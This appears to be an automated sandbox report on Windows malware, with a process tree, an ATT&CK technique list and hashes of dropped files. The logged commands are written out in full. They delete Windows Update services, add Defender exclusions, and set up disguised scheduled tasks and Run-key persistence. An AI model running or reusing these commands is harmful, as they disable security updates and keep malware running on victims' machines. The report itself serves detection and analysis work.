C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:12200

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:6336

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:14248

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:13500

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:9588

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:9552

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:7964

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:6100

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:6280

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:14152

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:9020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:13116

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
2⤵
PID:8512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:12832

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:3408

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:9744

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:13048

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:6628

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:8216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xfxixcb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:13044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#urswz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'WindowsProcessHost' /tr '''C:\Users\Admin\Windows\drivers\ProcHost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows\drivers\ProcHost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsProcessHost' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsProcessHost" /t REG_SZ /f /d 'C:\Users\Admin\Windows\drivers\ProcHost.exe' }
1⤵
PID:13184

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:12596

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:10016

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:9020

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:5748

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:13852

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:12592

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:13596

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:12144

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:10992

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:10696

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:3692

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:2156

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:14032

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:7964

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:13192

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:11472

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:11416

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:6280

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:11080

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:7832

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:8428

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
PID:12332

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:11808

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
2⤵
PID:420

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
2⤵
PID:13892

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
3⤵
- Creates scheduled task(s)
PID:7864

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:12472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#veixcl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsProcessHost" } Else { "C:\Users\Admin\Windows\drivers\ProcHost.exe" }
1⤵
PID:7856

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsProcessHost
2⤵
PID:3756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:10720

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:14088

C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe
C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe
1⤵
PID:12040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tfnducb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:9700

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:13604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#extmbyk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
1⤵
PID:5952

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
2⤵
PID:8304

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe"
1⤵
- Gathers network information
PID:14040

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe"
2⤵
PID:6160

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20230505-0621.dm
1⤵
PID:13060

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:8476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:12772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xjwvbygm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:13948

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:13860

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:13008

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:12188

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:9700

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:11860

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
PID:11800

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:10636

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
2⤵
PID:12264

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:420

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
2⤵
PID:2116

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
3⤵
- Creates scheduled task(s)
PID:11724

C:\Program Files (x86)\Mqffd\_nsdufotapxfw.exe
"C:\Program Files (x86)\Mqffd\_nsdufotapxfw.exe"
1⤵
PID:13400

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:5816

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
3KB

MD5
1d3a2c083dc1ec35fd60d9b41b44e542

SHA1
e8c5ad8f408c03fe58af59e40b8a80fdc431a8da

SHA256
13a6229571025f00ff1634f079855b93a82bb82d618936e4da4344d3328ccf54

SHA512
f13c7b2ad31a6691806631f9f480cac07d6c0105477689d12d6232f573103da62b7a5f43c0d173413749d5071ea117d28d7a7637d5b5447a260b3daa237cdd85

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
3KB

MD5
121e16b54362bbe21cbd5902724bd43b

SHA1
aba2bb94351c3fd3c37f7ed5457d0fc1600e87b1

SHA256
aa2d0a116e8ae75f9324dc49656fdadc54c98301ad4292d55591c6c324879a18

SHA512
0a5d032266e17bf54d92825b78aeb532c6bf5d1d789b4dd4e50f84dc8151a91903f80954ec21581bcd3332f835a504da67254a0ef403fd1c1165d6364e5b2dc5

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
538B

MD5
8b23661dc3515e9ec6c23ce86fd17b42

SHA1
978bf84d1bb55450ec977cf117a92fb5410605aa

SHA256
0667bf8b1a83d2707ac3521c5747351792b237338e55587dfc4f45246498f23a

SHA512
467b16fb2ed85d2b8a38f6a54ec8c86c21b9c73c6d0351ec8b628cb9b41615e44f468517f9425da9728afe65a117641bd156f7779e5d9fc57f7b0cb36e1ead45

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
1KB

MD5
39803d4dc99321afc81bf0f237ddd145

SHA1
2edf50636fa0b3ff72d9e3d01a0762bc96b312b3

SHA256
b27ada5b0d3ba982dc9706fef1ca46c6e78119acd3eb5b795dd83314245fadaf

SHA512
e7c82fdbcc43389f87ac69cd12486f06aa734f1e63f91c415bc44d4b993554c4bb5729013b73ce53718875aded4ce708ed3cd7c024e45a1b1961001f1db8ab58

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
1KB

MD5
38b2e4b653c1ec6991a8f2f7e75331a6

SHA1
c7874d961378a2bca6a8e32cc9f0c5629b8d2cd3

SHA256
e0c9932d36f0dd5d9c70d6486bf7b40c15324e636bc6a9ed78da7a94cea51942

SHA512
34e1bcab8f76e818c8c897b6c304812986e12fba54cd324ca9673ed7ffb63d2729cc2481d3703de4454cdf8ecaaeaa7fd2b0abcedd7d2b687ebd90fd42b11c29

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
1KB

MD5
9b40a5bb30294fabd4eeda84324399c3

SHA1
9abe750101fd09176efc9cdee555163753ad068b

SHA256
9c0b41961754bcb7a9fea9dd7aea95b61fc02414a4ecaf3857432da836120b78

SHA512
c2642bee326ef2941fce2e67130e5135a1cab227c0ad3c621ca2c4f2cdf828f4dd9506ed38a7032231cfe0200b3a0569ccf84cb855c1d87b92107543fd7a131f

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
2KB

MD5
ea243e5460a010923e3866ef81875f1b

SHA1
17e914cdcdeedc1c39c22ce3d52a6f7970eb6009

SHA256
fc9847b179e3abe37c291fef7cf16d3027fcc4a2600fa3831f8a96c76e053014

SHA512
1f4e66663f1ee8f400f9f634a78ef436d8d403730cec4717b5f2c5885a3b0cb9a26c5873a48b6195d1c01bf1a03414451be49f60d3e956c7eb40b3288e294397

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
3KB

MD5
35231541e925b35f03b82a7eb4e243cc

SHA1
12cac4d646aabfc5747c2e2e088ca82fa40f01fc

SHA256
9c407233519249b7deb0cb7f75ec9e8d484b059eb4f40d9830763e8871bfcd12

SHA512
ddf210585a765637e2c608a23940f72e2d5e46228e871bf16c1ce1338d0c3e032d30c2a1bc8e774ca8051d06e6d2b5137a7068d2824303f63d3c5c7fbb0f9078

Download Submit
C:\ProgramData\remcos\logs.dat
Filesize
3KB

MD5
9d2e4df78781cbfbef399b0961df6762

SHA1
35d531a3d4c90136c67333411cee0c69ed03d4bf

SHA256
7e03b2266da76f964c3999332f6763d63750817f7ec4a090b3a636828a6495c6

SHA512
93644df82165c41fb90c291f5adef1bc562231c4b7419dbba8b31f9f8ba1cecceeece8c9fd916a2b57077eb327c6b856889d23a72eea63febfa5ebfb1d808cab

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User DataRRWP6\Default\Web Data
Filesize
92KB

MD5
b133605a69c0c42d03bb7e5020b86258

SHA1
ad8bb42ba6411cf8df977b47f2dbed7d4a214a0f

SHA256
f0c9146c1d86eac1962b0722ccf051e8783c1e8977380cba1ce366a41861d20a

SHA512
2f32b79eccb10f524e82eab7301630a504046075a066b0383cb546b7569d2b558a4db45a9ca6743f969e9bf970896e7e0df6cc9f214542527c8bb9e0f323e15c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\k2673218.exe.log
Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\robinzx.exe.log
Filesize
226B

MD5
d78293ab15ad25b5d6e8740fe5fd3872

SHA1
51b70837f90f2bff910daee706e6be8d62a3550e

SHA256
4d64746f8d24ec321b1a6c3a743946b66d8317cbc6bac6fed675a4bf6fa181f3

SHA512
1127435ef462f52677e1ef4d3b8cfdf9f5d95c832b4c9f41526b7448d315f25d96d3d5454108569b76d66d78d07ea5ba4a1ba8baee108e8c1b452ba19cc04925

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\govonorzx.exe.log
Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zxcvb.exe.log
Filesize
1KB

MD5
5c01a57bb6376dc958d99ed7a67870ff

SHA1
d092c7dfd148ac12b086049d215e6b00bd78628d

SHA256
cb8fd245425e915bfc5ff411f26303f7cb4a30ed37f2ea4a2f0a12501aa5f2a4

SHA512
e4e3a4b74f8e209573cce58b572c1f71653e6f4df98f98c5a1cecdf76c9ffb91d5e6994c89df41c9f3613a0584301a56ca922ab7497a434e108b28dcd7d33038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\480JMPRZ\json[3].json
Filesize
930B

MD5
297684f8c43977e4b55b35f62e84f3ed

SHA1
4967b457452d975d97fe0ab19a9c4c4bfabb6c90

SHA256
b7796c10c5437b2e3e94712cced25d294be8871caa091ce7d321c237efc546ca

SHA512
0d7c74dbfeb6542f787fbacdedfd14efc39bb2fadc150d32676232a0a4c8015c2291f30e861904ab28299f1ccdf178b040e2bdc68164b3c2f85f764221b753dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\480JMPRZ\opera[1].json
Filesize
33B

MD5
de538dc833af75fbd5961de7daf78930

SHA1
9bb3dbe482cc90957422d68806030c9ef2b035e3

SHA256
a4fc98b2310d42a185d44e866f85eb33abdf8c99cc6ccc2e44f1cfc738dc2471

SHA512
fe323cfa6a848453dbfd58b17a5f0682b8f812eea213ac7a43196a9281928a1dd2ea3d57894dd76661d6ad0aa5e7c4358da52c797ef8fea6e944bdc907d91189

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\480JMPRZ\regex[2].txt
Filesize
633B

MD5
c5298d2c78be8fdfc264eb6fe3e275f8

SHA1
f09de5f443da081efaff0155f422ca0375edd164

SHA256
de32b3c0549fde0dc5ac435a89f16a87832a0632b6602e75f552d07074081577

SHA512
5aeb5013b00e13cd8a172639bc7c675bd06cc0473ae9844c9c324e5c322987ddeff986bd4a8e620ce0ca9d1098a3ee8bbb4802789d1e89b0ec0cecf2f55a4853

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6RO0PN6W\json[3].json
Filesize
930B

MD5
99141b2b9f15d0f41e00a8b69e53671c

SHA1
3c8467220a82e2eca4aa3419580415d33e212cfc

SHA256
6430906f6a396c030e1a47d900bb3c9b8fb791e9d94c60e72fb61fb9441e7b51

SHA512
9c977590b6d5eaf0019752d169e181df62dd916c19ad61ffb6cfaec913572739815697bef8d77305764107e9a328231de36c6f06bb1e0f10f2cd0f36d2ac1f87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6RO0PN6W\online[2].txt
Filesize
2B

MD5
444bcb3a3fcf8389296c49467f27e1d6

SHA1
7a85f4764bbd6daf1c3545efbbf0f279a6dc0beb

SHA256
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df

SHA512
9fbbbb5a0f329f9782e2356fa41d89cf9b3694327c1a934d6af2a9df2d7f936ce83717fb513196a4ce5548471708cd7134c2ae99b3c357bcabb2eafc7b9b7570

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
51KB

MD5
d9e8b418516095836ebfb1896e7e3cb2

SHA1
5d3e699b02fd915b341ab66ea4ab76039b9d0f30

SHA256
e7c1c03da6eb16f2ee0b45da7b392294d605c788fa6cdc6c7296d75a24a4bf2a

SHA512
f14db2476d6c50a51a574327755fd43cfa978aa3d8bc9e4dbbbdd08036d28c47724e4c97086ab54aaf28187869092e5cb860d8a4f581592123c823976dacd281

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
51KB

MD5
852d9c407ecad8860ca2bcc47f66b605

SHA1
279bcfb7424fb0a9c4170da7f0e511e5085ae47d

SHA256
4a5e180b2c0a1b82933b65f0603a375e020c64d37266c7aca13b8540424f1e79

SHA512
9c71592c43a792345e289ff775ffeecfed3473579c2de2f5b36a5c5018f2fd51da33bafe185c0d870456ad658494d7deaa9eaeeca694b2775bcf32ee8bd467f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
51KB

MD5
67fc2e9612ff399319a7970e5a92605a

SHA1
a5a11f5e6a2f180cd1a2655e22e3f38f6a34f132

SHA256
1a117905ef10731470ff82a7f624506a0829996aeb14a71085f0d1d0b24de659

SHA512
b69dca5e2410d0d57f3007f56dc02939c7887970cebd174f28797ffc94dc0afba4240478479cf34f15cc7a61dffa3885d810033dfdc305ef4d8e1f1e767548da

Download Submit
C:\Users\Admin\AppData\Local\NET.Framework\build(3).exe
Filesize
50KB

MD5
